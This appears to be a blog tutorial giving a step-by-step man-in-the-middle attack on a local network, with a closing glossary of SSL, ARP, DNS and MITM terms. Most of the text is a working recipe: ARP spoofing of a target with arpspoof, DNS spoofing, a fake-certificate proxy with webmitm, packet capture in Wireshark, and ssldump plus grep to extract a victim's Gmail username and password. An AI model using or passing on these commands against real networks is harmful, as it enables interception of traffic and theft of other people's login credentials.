Step 1: First you need to setup ip forwarding using fragrouter. Open a terminal and type the command.
Command: fragrouter -B1
This is to forward packets between the client and its gateway while spoofing. Minimize the terminal.
Step 2: Now you need to “arp spoof” the client. Open a new terminal and type the command.
Command: arpspoof -t [target ip] [default gateway ip]
example : arpspoof -t 192.168.1.7 192.168.1.1
Minimize the terminal.
Step 3: Now you need to set up “DNS spoofing”. Open a new terminal and type the command.
Command: dnsspoof
Minimize the terminal.
Now all the DNS requests from the client will be redirected to the MITM.
Step 4: Now you need to set up a proxy for these DNS requests. Open a new terminal and type the command.
Command: webmitm -d
NOTE: If you are starting Webmitm for the first time, it will create a fake SSL certificate and private key. Answer the questions it asks with false information and you should get the message “webmitm relaying transparently".
Minimize the terminal.
Step 5: Now you need to capture the traffic using wireshark.
Command: applications ->backtrack -> information gathering ->network analysis ->network traffic analysis ->wireshark
Step 6: In wireshark select :
Command: capture -> interfaces -> start (click start button for eth0)
The DNS has been spoofed so you can see that an nslookup for Gmail in the client computer will show the MITM attacker's ip :
When the client accesses Gmail, the following happens:
1. The client opens "Gmail.com" in a browser.
2. This will be redirected to webmitm, which will issue the “Gmail page” with a fake ssl certificate.
3. The client will log into "Gmail" using his credentials.
4. All the traffic will be captured by wireshark.
Step 7: Stop the wireshark capture and save the captured traffic to a file. Save it in the root folder to make it easier.
In the root folder there will be another file called "webmitm.crt" which is the fake ssl certificate generated by webmitm.
Now you have captured ssl packets from the network traffic and the fake ssl certificate.
Step 8: Now you need to decrypt the captured packets. Open a new terminal and type the command.
Command: ssldump -r test -k webmitm.crt -d > finaloutput
NOTE:
• test is the file containing the packets captured with wireshark• webmitm.crt is the fake SSL certificate
• finaloutput is the file that will contain the decrypted output
Command: cat finaloutput | grep Email
Highlighted above are the decrypted username and password.
Definitons & Tools:
1.) SSL :
Quote:Secure Sockets Layer, a computing protocol that ensures the security of data sent via the Internet by using encryption . With SSL, client and server computers exchange public keys, allowing them to encode and decode their communication. So any attacker tries to sniff traffic between them will only get encrypted garbage values... the web servers which use SSL are denoted by HTTPS ...
2.) ARP :
Quote:Address Resolution Protocol is a network layer protocol used to convert an IP address into a physical address such as an Ethernet address( MAC address ). A host wishing to obtain a physical address broadcasts an ARP request onto the TCP/IP network. The host on the network that has the IP address in the request then replies with its physical hardware address.
3.)DNS :
Quote:Domain Name System is a database system that translates a domain name into an IP address. for example if you type gmail.com in your browser , your DNS will reply with gmail's ip so that,your router can connect to gmail's server using its IP....for better understanding type -->" nslookup " in your cmd or konsole and then type "gmail.com" ,you will see your DNS replies you with gmail's ip addresses .
4.)ARP Spoofing :
Quote:ARP spoofing is a technique in which a host in a LAN can "poison" the ARP table of another host by forging fake ARP requests and replies , causing it to send packets to the wrong destination. The attacker can modify the traffic in the network such a way that it will redirect all traffic to go through it. ARP Spoofing will allow an attacker to sniff data frames.
5)DNS Spoofing :
Quote:DNS spoofing is similar to arp spoofing ,it is based on the presentation of false or fake DNS information to the slave in a response to their DNS request and as a result forcing them to visit a site which is not the real one.
6.) MITM :
Quote:Man in the middle attack means intercepting a communication between two systems ,both ARP Spoofing and DNS
Spoofing are types of MITM attack..
7.)IP forwarding :
Quote:IP forwarding enables one host to sit on two LANs and to act as a gateway forwarding IP packets from one LAN to another.
TooLs :-
1.) fragrouter - tool used to for ip forwarding between slave and its destination host.
2.) arpspoof - to arp spoof slave machine and its host
3.) dnsspoof - to dns spoof slave machine and its host
4.) webmitm - its a tool which transparently proxies and sniffs HTTP / HTTPS traffic redirected by dnsspoof, capturing most "secure" SSL-encrypted webmail logins and form submissions...
5.) wireshark - it is a network protocol analyzer . here its used to capture ssl encrypted traffic between slave and webmitm...
6.) ssldump - decrypts ssl packets using private key
No hay comentarios:
Publicar un comentario